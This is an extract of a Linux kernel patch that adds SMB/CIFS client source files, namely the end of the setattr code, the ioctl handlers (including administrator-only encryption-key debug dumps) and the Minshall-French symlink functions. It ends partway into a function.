++	setattr_copy(&init_user_ns, inode, attrs);
++	mark_inode_dirty(inode);
++
++cifs_setattr_exit:
++	free_xid(xid);
++	free_dentry_path(page);
++	return rc;
++}
++
++int
++cifs_setattr(struct user_namespace *mnt_userns, struct dentry *direntry,
++	     struct iattr *attrs)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	int rc, retries = 0;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_tcon *pTcon = cifs_sb_master_tcon(cifs_sb);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	do {
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++		if (pTcon->unix_ext)
++			rc = cifs_setattr_unix(direntry, attrs);
++		else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++			rc = cifs_setattr_nounix(direntry, attrs);
++		retries++;
++	} while (is_retryable_error(rc) && retries < 2);
++
++	/* BB: add cifs_setattr_legacy for really old servers */
++	return rc;
++}
+diff --git a/fs/smb/client/ioctl.c b/fs/smb/client/ioctl.c
+new file mode 100644
+index 0000000000000..6419ec47c2a85
+--- /dev/null
++++ b/fs/smb/client/ioctl.c
+@@ -0,0 +1,526 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   vfs operations that deal with io control
++ *
++ *   Copyright (C) International Business Machines  Corp., 2005,2013
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/file.h>
++#include <linux/mount.h>
++#include <linux/mm.h>
++#include <linux/pagemap.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifsfs.h"
++#include "cifs_ioctl.h"
++#include "smb2proto.h"
++#include "smb2glob.h"
++#include <linux/btrfs.h>
++
++static long cifs_ioctl_query_info(unsigned int xid, struct file *filep,
++				  unsigned long p)
++{
++	struct inode *inode = file_inode(filep);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct dentry *dentry = filep->f_path.dentry;
++	const unsigned char *path;
++	void *page = alloc_dentry_path();
++	__le16 *utf16_path = NULL, root_path;
++	int rc = 0;
++
++	path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(path)) {
++		free_dentry_path(page);
++		return PTR_ERR(path);
++	}
++
++	cifs_dbg(FYI, "%s %s\n", __func__, path);
++
++	if (!path[0]) {
++		root_path = 0;
++		utf16_path = &root_path;
++	} else {
++		utf16_path = cifs_convert_path_to_utf16(path + 1, cifs_sb);
++		if (!utf16_path) {
++			rc = -ENOMEM;
++			goto ici_exit;
++		}
++	}
++
++	if (tcon->ses->server->ops->ioctl_query_info)
++		rc = tcon->ses->server->ops->ioctl_query_info(
++				xid, tcon, cifs_sb, utf16_path,
++				filep->private_data ? 0 : 1, p);
++	else
++		rc = -EOPNOTSUPP;
++
++ ici_exit:
++	if (utf16_path != &root_path)
++		kfree(utf16_path);
++	free_dentry_path(page);
++	return rc;
++}
++
++static long cifs_ioctl_copychunk(unsigned int xid, struct file *dst_file,
++			unsigned long srcfd)
++{
++	int rc;
++	struct fd src_file;
++	struct inode *src_inode;
++
++	cifs_dbg(FYI, "ioctl copychunk range\n");
++	/* the destination must be opened for writing */
++	if (!(dst_file->f_mode & FMODE_WRITE)) {
++		cifs_dbg(FYI, "file target not open for write\n");
++		return -EINVAL;
++	}
++
++	/* check if target volume is readonly and take reference */
++	rc = mnt_want_write_file(dst_file);
++	if (rc) {
++		cifs_dbg(FYI, "mnt_want_write failed with rc %d\n", rc);
++		return rc;
++	}
++
++	src_file = fdget(srcfd);
++	if (!src_file.file) {
++		rc = -EBADF;
++		goto out_drop_write;
++	}
++
++	if (src_file.file->f_op->unlocked_ioctl != cifs_ioctl) {
++		rc = -EBADF;
++		cifs_dbg(VFS, "src file seems to be from a different filesystem type\n");
++		goto out_fput;
++	}
++
++	src_inode = file_inode(src_file.file);
++	rc = -EINVAL;
++	if (S_ISDIR(src_inode->i_mode))
++		goto out_fput;
++
++	rc = cifs_file_copychunk_range(xid, src_file.file, 0, dst_file, 0,
++					src_inode->i_size, 0);
++	if (rc > 0)
++		rc = 0;
++out_fput:
++	fdput(src_file);
++out_drop_write:
++	mnt_drop_write_file(dst_file);
++	return rc;
++}
++
++static long smb_mnt_get_fsinfo(unsigned int xid, struct cifs_tcon *tcon,
++				void __user *arg)
++{
++	int rc = 0;
++	struct smb_mnt_fs_info *fsinf;
++
++	fsinf = kzalloc(sizeof(struct smb_mnt_fs_info), GFP_KERNEL);
++	if (fsinf == NULL)
++		return -ENOMEM;
++
++	fsinf->version = 1;
++	fsinf->protocol_id = tcon->ses->server->vals->protocol_id;
++	fsinf->device_characteristics =
++			le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics);
++	fsinf->device_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
++	fsinf->fs_attributes = le32_to_cpu(tcon->fsAttrInfo.Attributes);
++	fsinf->max_path_component =
++		le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
++	fsinf->vol_serial_number = tcon->vol_serial_number;
++	fsinf->vol_create_time = le64_to_cpu(tcon->vol_create_time);
++	fsinf->share_flags = tcon->share_flags;
++	fsinf->share_caps = le32_to_cpu(tcon->capabilities);
++	fsinf->sector_flags = tcon->ss_flags;
++	fsinf->optimal_sector_size = tcon->perf_sector_size;
++	fsinf->max_bytes_chunk = tcon->max_bytes_chunk;
++	fsinf->maximal_access = tcon->maximal_access;
++	fsinf->cifs_posix_caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
++
++	if (copy_to_user(arg, fsinf, sizeof(struct smb_mnt_fs_info)))
++		rc = -EFAULT;
++
++	kfree(fsinf);
++	return rc;
++}
++
++static int cifs_shutdown(struct super_block *sb, unsigned long arg)
++{
++	struct cifs_sb_info *sbi = CIFS_SB(sb);
++	__u32 flags;
++
++	if (!capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	if (get_user(flags, (__u32 __user *)arg))
++		return -EFAULT;
++
++	if (flags > CIFS_GOING_FLAGS_NOLOGFLUSH)
++		return -EINVAL;
++
++	if (cifs_forced_shutdown(sbi))
++		return 0;
++
++	cifs_dbg(VFS, "shut down requested (%d)", flags);
++/*	trace_cifs_shutdown(sb, flags);*/
++
++	/*
++	 * see:
++	 *   https://man7.org/linux/man-pages/man2/ioctl_xfs_goingdown.2.html
++	 * for more information and description of original intent of the flags
++	 */
++	switch (flags) {
++	/*
++	 * We could add support later for default flag which requires:
++	 *     "Flush all dirty data and metadata to disk"
++	 * would need to call syncfs or equivalent to flush page cache for
++	 * the mount and then issue fsync to server (if nostrictsync not set)
++	 */
++	case CIFS_GOING_FLAGS_DEFAULT:
++		cifs_dbg(FYI, "shutdown with default flag not supported\n");
++		return -EINVAL;
++	/*
++	 * FLAGS_LOGFLUSH is easy since it asks to write out metadata (not
++	 * data) but metadata writes are not cached on the client, so can treat
++	 * it similarly to NOLOGFLUSH
++	 */
++	case CIFS_GOING_FLAGS_LOGFLUSH:
++	case CIFS_GOING_FLAGS_NOLOGFLUSH:
++		sbi->mnt_cifs_flags |= CIFS_MOUNT_SHUTDOWN;
++		return 0;
++	default:
++		return -EINVAL;
++	}
++	return 0;
++}
++
++static int cifs_dump_full_key(struct cifs_tcon *tcon, struct smb3_full_key_debug_info __user *in)
++{
++	struct smb3_full_key_debug_info out;
++	struct cifs_ses *ses;
++	int rc = 0;
++	bool found = false;
++	u8 __user *end;
++
++	if (!smb3_encryption_required(tcon)) {
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	/* copy user input into our output buffer */
++	if (copy_from_user(&out, in, sizeof(out))) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	if (!out.session_id) {
++		/* if ses id is 0, use current user session */
++		ses = tcon->ses;
++	} else {
++		/* otherwise if a session id is given, look for it in all our sessions */
++		struct cifs_ses *ses_it = NULL;
++		struct TCP_Server_Info *server_it = NULL;
++
++		spin_lock(&cifs_tcp_ses_lock);
++		list_for_each_entry(server_it, &cifs_tcp_ses_list, tcp_ses_list) {
++			list_for_each_entry(ses_it, &server_it->smb_ses_list, smb_ses_list) {
++				if (ses_it->Suid == out.session_id) {
++					ses = ses_it;
++					/*
++					 * since we are using the session outside the crit
++					 * section, we need to make sure it won't be released
++					 * so increment its refcount
++					 */
++					ses->ses_count++;
++					found = true;
++					goto search_end;
++				}
++			}
++		}
++search_end:
++		spin_unlock(&cifs_tcp_ses_lock);
++		if (!found) {
++			rc = -ENOENT;
++			goto out;
++		}
++	}
++
++	switch (ses->server->cipher_type) {
++	case SMB2_ENCRYPTION_AES128_CCM:
++	case SMB2_ENCRYPTION_AES128_GCM:
++		out.session_key_length = CIFS_SESS_KEY_SIZE;
++		out.server_in_key_length = out.server_out_key_length = SMB3_GCM128_CRYPTKEY_SIZE;
++		break;
++	case SMB2_ENCRYPTION_AES256_CCM:
++	case SMB2_ENCRYPTION_AES256_GCM:
++		out.session_key_length = CIFS_SESS_KEY_SIZE;
++		out.server_in_key_length = out.server_out_key_length = SMB3_GCM256_CRYPTKEY_SIZE;
++		break;
++	default:
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	/* check if user buffer is big enough to store all the keys */
++	if (out.in_size < sizeof(out) + out.session_key_length + out.server_in_key_length
++	    + out.server_out_key_length) {
++		rc = -ENOBUFS;
++		goto out;
++	}
++
++	out.session_id = ses->Suid;
++	out.cipher_type = le16_to_cpu(ses->server->cipher_type);
++
++	/* overwrite user input with our output */
++	if (copy_to_user(in, &out, sizeof(out))) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	/* append all the keys at the end of the user buffer */
++	end = in->data;
++	if (copy_to_user(end, ses->auth_key.response, out.session_key_length)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	end += out.session_key_length;
++
++	if (copy_to_user(end, ses->smb3encryptionkey, out.server_in_key_length)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	end += out.server_in_key_length;
++
++	if (copy_to_user(end, ses->smb3decryptionkey, out.server_out_key_length)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++out:
++	if (found)
++		cifs_put_smb_ses(ses);
++	return rc;
++}
++
++long cifs_ioctl(struct file *filep, unsigned int command, unsigned long arg)
++{
++	struct inode *inode = file_inode(filep);
++	struct smb3_key_debug_info pkey_inf;
++	int rc = -ENOTTY; /* strange error - but the precedent */
++	unsigned int xid;
++	struct cifsFileInfo *pSMBFile = filep->private_data;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb;
++	__u64	ExtAttrBits = 0;
++	__u64   caps;
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "cifs ioctl 0x%x\n", command);
++	switch (command) {
++		case FS_IOC_GETFLAGS:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
++#ifdef CONFIG_CIFS_POSIX
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++			if (CIFS_UNIX_EXTATTR_CAP & caps) {
++				__u64	ExtAttrMask = 0;
++				rc = CIFSGetExtAttr(xid, tcon,
++						    pSMBFile->fid.netfid,
++						    &ExtAttrBits, &ExtAttrMask);
++				if (rc == 0)
++					rc = put_user(ExtAttrBits &
++						FS_FL_USER_VISIBLE,
++						(int __user *)arg);
++				if (rc != -EOPNOTSUPP)
++					break;
++			}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++#endif /* CONFIG_CIFS_POSIX */
++			rc = 0;
++			if (CIFS_I(inode)->cifsAttrs & ATTR_COMPRESSED) {
++				/* add in the compressed bit */
++				ExtAttrBits = FS_COMPR_FL;
++				rc = put_user(ExtAttrBits & FS_FL_USER_VISIBLE,
++					      (int __user *)arg);
++			}
++			break;
++		case FS_IOC_SETFLAGS:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			/* caps = le64_to_cpu(tcon->fsUnixInfo.Capability); */
++
++			if (get_user(ExtAttrBits, (int __user *)arg)) {
++				rc = -EFAULT;
++				break;
++			}
++
++			/*
++			 * if (CIFS_UNIX_EXTATTR_CAP & caps)
++			 *	rc = CIFSSetExtAttr(xid, tcon,
++			 *		       pSMBFile->fid.netfid,
++			 *		       extAttrBits,
++			 *		       &ExtAttrMask);
++			 * if (rc != -EOPNOTSUPP)
++			 *	break;
++			 */
++
++			/* Currently only flag we can set is compressed flag */
++			if ((ExtAttrBits & FS_COMPR_FL) == 0)
++				break;
++
++			/* Try to set compress flag */
++			if (tcon->ses->server->ops->set_compression) {
++				rc = tcon->ses->server->ops->set_compression(
++							xid, tcon, pSMBFile);
++				cifs_dbg(FYI, "set compress flag rc %d\n", rc);
++			}
++			break;
++		case CIFS_IOC_COPYCHUNK_FILE:
++			rc = cifs_ioctl_copychunk(xid, filep, arg);
++			break;
++		case CIFS_QUERY_INFO:
++			rc = cifs_ioctl_query_info(xid, filep, arg);
++			break;
++		case CIFS_IOC_SET_INTEGRITY:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			if (tcon->ses->server->ops->set_integrity)
++				rc = tcon->ses->server->ops->set_integrity(xid,
++						tcon, pSMBFile);
++			else
++				rc = -EOPNOTSUPP;
++			break;
++		case CIFS_IOC_GET_MNT_INFO:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			rc = smb_mnt_get_fsinfo(xid, tcon, (void __user *)arg);
++			break;
++		case CIFS_ENUMERATE_SNAPSHOTS:
++			if (pSMBFile == NULL)
++				break;
++			if (arg == 0) {
++				rc = -EINVAL;
++				goto cifs_ioc_exit;
++			}
++			tcon = tlink_tcon(pSMBFile->tlink);
++			if (tcon->ses->server->ops->enum_snapshots)
++				rc = tcon->ses->server->ops->enum_snapshots(xid, tcon,
++						pSMBFile, (void __user *)arg);
++			else
++				rc = -EOPNOTSUPP;
++			break;
++		case CIFS_DUMP_KEY:
++			/*
++			 * Dump encryption keys. This is an old ioctl that only
++			 * handles AES-128-{CCM,GCM}.
++			 */
++			if (pSMBFile == NULL)
++				break;
++			if (!capable(CAP_SYS_ADMIN)) {
++				rc = -EACCES;
++				break;
++			}
++
++			tcon = tlink_tcon(pSMBFile->tlink);
++			if (!smb3_encryption_required(tcon)) {
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			pkey_inf.cipher_type =
++				le16_to_cpu(tcon->ses->server->cipher_type);
++			pkey_inf.Suid = tcon->ses->Suid;
++			memcpy(pkey_inf.auth_key, tcon->ses->auth_key.response,
++					16 /* SMB2_NTLMV2_SESSKEY_SIZE */);
++			memcpy(pkey_inf.smb3decryptionkey,
++			      tcon->ses->smb3decryptionkey, SMB3_SIGN_KEY_SIZE);
++			memcpy(pkey_inf.smb3encryptionkey,
++			      tcon->ses->smb3encryptionkey, SMB3_SIGN_KEY_SIZE);
++			if (copy_to_user((void __user *)arg, &pkey_inf,
++					sizeof(struct smb3_key_debug_info)))
++				rc = -EFAULT;
++			else
++				rc = 0;
++			break;
++		case CIFS_DUMP_FULL_KEY:
++			/*
++			 * Dump encryption keys (handles any key sizes)
++			 */
++			if (pSMBFile == NULL)
++				break;
++			if (!capable(CAP_SYS_ADMIN)) {
++				rc = -EACCES;
++				break;
++			}
++			tcon = tlink_tcon(pSMBFile->tlink);
++			rc = cifs_dump_full_key(tcon, (void __user *)arg);
++			break;
++		case CIFS_IOC_NOTIFY:
++			if (!S_ISDIR(inode->i_mode)) {
++				/* Notify can only be done on directories */
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			cifs_sb = CIFS_SB(inode->i_sb);
++			tlink = cifs_sb_tlink(cifs_sb);
++			if (IS_ERR(tlink)) {
++				rc = PTR_ERR(tlink);
++				break;
++			}
++			tcon = tlink_tcon(tlink);
++			if (tcon && tcon->ses->server->ops->notify) {
++				rc = tcon->ses->server->ops->notify(xid,
++						filep, (void __user *)arg,
++						false /* no ret data */);
++				cifs_dbg(FYI, "ioctl notify rc %d\n", rc);
++			} else
++				rc = -EOPNOTSUPP;
++			cifs_put_tlink(tlink);
++			break;
++		case CIFS_IOC_NOTIFY_INFO:
++			if (!S_ISDIR(inode->i_mode)) {
++				/* Notify can only be done on directories */
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			cifs_sb = CIFS_SB(inode->i_sb);
++			tlink = cifs_sb_tlink(cifs_sb);
++			if (IS_ERR(tlink)) {
++				rc = PTR_ERR(tlink);
++				break;
++			}
++			tcon = tlink_tcon(tlink);
++			if (tcon && tcon->ses->server->ops->notify) {
++				rc = tcon->ses->server->ops->notify(xid,
++						filep, (void __user *)arg,
++						true /* return details */);
++				cifs_dbg(FYI, "ioctl notify info rc %d\n", rc);
++			} else
++				rc = -EOPNOTSUPP;
++			cifs_put_tlink(tlink);
++			break;
++		case CIFS_IOC_SHUTDOWN:
++			rc = cifs_shutdown(inode->i_sb, arg);
++			break;
++		default:
++			cifs_dbg(FYI, "unsupported ioctl\n");
++			break;
++	}
++cifs_ioc_exit:
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/link.c b/fs/smb/client/link.c
+new file mode 100644
+index 0000000000000..c0f101fc1e5d0
+--- /dev/null
++++ b/fs/smb/client/link.c
+@@ -0,0 +1,650 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/namei.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "smb2proto.h"
++#include "cifs_ioctl.h"
++
++/*
++ * M-F Symlink Functions - Begin
++ */
++
++#define CIFS_MF_SYMLINK_LEN_OFFSET (4+1)
++#define CIFS_MF_SYMLINK_MD5_OFFSET (CIFS_MF_SYMLINK_LEN_OFFSET+(4+1))
++#define CIFS_MF_SYMLINK_LINK_OFFSET (CIFS_MF_SYMLINK_MD5_OFFSET+(32+1))
++#define CIFS_MF_SYMLINK_LINK_MAXLEN (1024)
++#define CIFS_MF_SYMLINK_FILE_SIZE \
++	(CIFS_MF_SYMLINK_LINK_OFFSET + CIFS_MF_SYMLINK_LINK_MAXLEN)
++
++#define CIFS_MF_SYMLINK_LEN_FORMAT "XSym\n%04u\n"
++#define CIFS_MF_SYMLINK_MD5_FORMAT "%16phN\n"
++#define CIFS_MF_SYMLINK_MD5_ARGS(md5_hash) md5_hash
++
++static int
++symlink_hash(unsigned int link_len, const char *link_str, u8 *md5_hash)
++{
++	int rc;
++	struct shash_desc *md5 = NULL;
++
++	rc = cifs_alloc_hash("md5", &md5);
++	if (rc)
++		goto symlink_hash_err;
++
++	rc = crypto_shash_init(md5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init md5 shash\n", __func__);
++		goto symlink_hash_err;
++	}
++	rc = crypto_shash_update(md5, link_str, link_len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with link_str\n", __func__);
++		goto symlink_hash_err;
++	}
++	rc = crypto_shash_final(md5, md5_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++symlink_hash_err:
++	cifs_free_hash(&md5);
++	return rc;
++}
++
++static int
++parse_mf_symlink(const u8 *buf, unsigned int buf_len, unsigned int *_link_len,
++		 char **_link_str)
++{
++	int rc;
++	unsigned int link_len;
++	const char *md5_str1;
++	const char *link_str;
++	u8 md5_hash[16];
++	char md5_str2[34];
++
++	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
++		return -EINVAL;
++
++	md5_str1 = (const char *)&buf[CIFS_MF_SYMLINK_MD5_OFFSET];
++	link_str = (const char *)&buf[CIFS_MF_SYMLINK_LINK_OFFSET];
++
++	rc = sscanf(buf, CIFS_MF_SYMLINK_LEN_FORMAT, &link_len);
++	if (rc != 1)
++		return -EINVAL;
++
++	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
++		return -EINVAL;
++
++	rc = symlink_hash(link_len, link_str, md5_hash);
++	if (rc) {
++		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
++		return rc;
++	}
++
++	scnprintf(md5_str2, sizeof(md5_str2),
++		  CIFS_MF_SYMLINK_MD5_FORMAT,
++		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
++
++	if (strncmp(md5_str1, md5_str2, 17) != 0)
++		return -EINVAL;
++
++	if (_link_str) {
++		*_link_str = kstrndup(link_str, link_len, GFP_KERNEL);
++		if (!*_link_str)
++			return -ENOMEM;
++	}
++
++	*_link_len = link_len;
++	return 0;
++}
++
++static int
++format_mf_symlink(u8 *buf, unsigned int buf_len, const char *link_str)
++{
++	int rc;
++	unsigned int link_len;
++	unsigned int ofs;
++	u8 md5_hash[16];
++
++	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
++		return -EINVAL;
++
++	link_len = strlen(link_str);
++
++	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
++		return -ENAMETOOLONG;
++
++	rc = symlink_hash(link_len, link_str, md5_hash);
++	if (rc) {
++		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
++		return rc;
++	}
++
++	scnprintf(buf, buf_len,
++		  CIFS_MF_SYMLINK_LEN_FORMAT CIFS_MF_SYMLINK_MD5_FORMAT,
++		  link_len,
++		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
++
++	ofs = CIFS_MF_SYMLINK_LINK_OFFSET;
++	memcpy(buf + ofs, link_str, link_len);
++
++	ofs += link_len;
++	if (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
++		buf[ofs] = '\n';
++		ofs++;
++	}
++
++	while (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
++		buf[ofs] = ' ';
++		ofs++;
++	}
++
++	return 0;
++}
++
++bool
++couldbe_mf_symlink(const struct cifs_fattr *fattr)
++{
++	if (!S_ISREG(fattr->cf_mode))
++		/* it's not a symlink */
++		return false;
++
++	if (fattr->cf_eof != CIFS_MF_SYMLINK_FILE_SIZE)
++		/* it's not a symlink */
++		return false;
++
++	return true;
++}
++
++static int
++create_mf_symlink(const unsigned int xid, struct cifs_tcon *tcon,
++		  struct cifs_sb_info *cifs_sb, const char *fromName,
++		  const char *toName)
++{
++	int rc;
++	u8 *buf;
++	unsigned int bytes_written = 0;
++
++	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	rc = format_mf_symlink(buf, CIFS_MF_SYMLINK_FILE_SIZE, toName);
++	if (rc)
++		goto out;
++
++	if (tcon->ses->server->ops->create_mf_symlink)
++		rc = tcon->ses->server->ops->create_mf_symlink(xid, tcon,
++					cifs_sb, fromName, buf, &bytes_written);
++	else
++		rc = -EOPNOTSUPP;
++
++	if (rc)
++		goto out;
++
++	if (bytes_written != CIFS_MF_SYMLINK_FILE_SIZE)
++		rc = -EIO;
++out:
++	kfree(buf);
++	return rc;
++}
++
++int
++check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		 struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
++		 const unsigned char *path)
++{
++	int rc;
++	u8 *buf = NULL;
++	unsigned int link_len = 0;
++	unsigned int bytes_read = 0;
++	char *symlink = NULL;
++
++	if (!couldbe_mf_symlink(fattr))
++		/* it's not a symlink */
++		return 0;
++
++	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	if (tcon->ses->server->ops->query_mf_symlink)
++		rc = tcon->ses->server->ops->query_mf_symlink(xid, tcon,
++					      cifs_sb, path, buf, &bytes_read);
++	else
++		rc = -ENOSYS;
++
++	if (rc)
++		goto out;
++
++	if (bytes_read == 0) /* not a symlink */
++		goto out;
++
++	rc = parse_mf_symlink(buf, bytes_read, &link_len, &symlink);
++	if (rc == -EINVAL) {
++		/* it's not a symlink */
++		rc = 0;
++		goto out;
++	}
++
++	if (rc != 0)
++		goto out;
++
++	/* it is a symlink */
++	fattr->cf_eof = link_len;
++	fattr->cf_mode &= ~S_IFMT;
++	fattr->cf_mode |= S_IFLNK | S_IRWXU | S_IRWXG | S_IRWXO;
++	fattr->cf_dtype = DT_LNK;
++	fattr->cf_symlink_target = symlink;
++out:
++	kfree(buf);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/*
++ * SMB 1.0 Protocol specific functions
++ */
++
++int
++cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		      char *pbuf, unsigned int *pbytes_read)
++{
++	int rc;
++	int oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	int buf_type = CIFS_NO_BUFFER;
++	FILE_ALL_INFO file_info;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
++	if (rc)
++		return rc;
++
++	if (file_info.EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
++		rc = -ENOENT;
++		/* it's not a symlink */
++		goto out;
++	}
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++
++	rc = CIFSSMBRead(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
++out:
++	CIFSSMBClose(xid, tcon, fid.netfid);
++	return rc;
++}
++
++int
++cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		       char *pbuf, unsigned int *pbytes_written)
++{
++	int rc;
++	int oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc)
++		return rc;
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++
++	rc = CIFSSMBWrite(xid, &io_parms, pbytes_written, pbuf);
++	CIFSSMBClose(xid, tcon, fid.netfid);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/*
++ * SMB 2.1/SMB3 Protocol specific functions
++ */
++int
++smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		      char *pbuf, unsigned int *pbytes_read)
++{
++	int rc;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	int buf_type = CIFS_NO_BUFFER;
++	__le16 *utf16_path;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct smb2_file_all_info *pfile_info = NULL;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.path = path,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.fid = &fid,
++	};
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (utf16_path == NULL)
++		return -ENOMEM;
++
++	pfile_info = kzalloc(sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
++			     GFP_KERNEL);
++
++	if (pfile_info == NULL) {
++		kfree(utf16_path);
++		return  -ENOMEM;
++	}
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, pfile_info, NULL,
++		       NULL, NULL);
++	if (rc)
++		goto qmf_out_open_fail;
++
++	if (pfile_info->EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
++		/* it's not a symlink */
++		rc = -ENOENT; /* Is there a better rc to return? */
++		goto qmf_out;
++	}
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++	io_parms.persistent_fid = fid.persistent_fid;
++	io_parms.volatile_fid = fid.volatile_fid;
++	rc = SMB2_read(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
++qmf_out:
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++qmf_out_open_fail:
++	kfree(utf16_path);
++	kfree(pfile_info);
++	return rc;
++}
++
++int
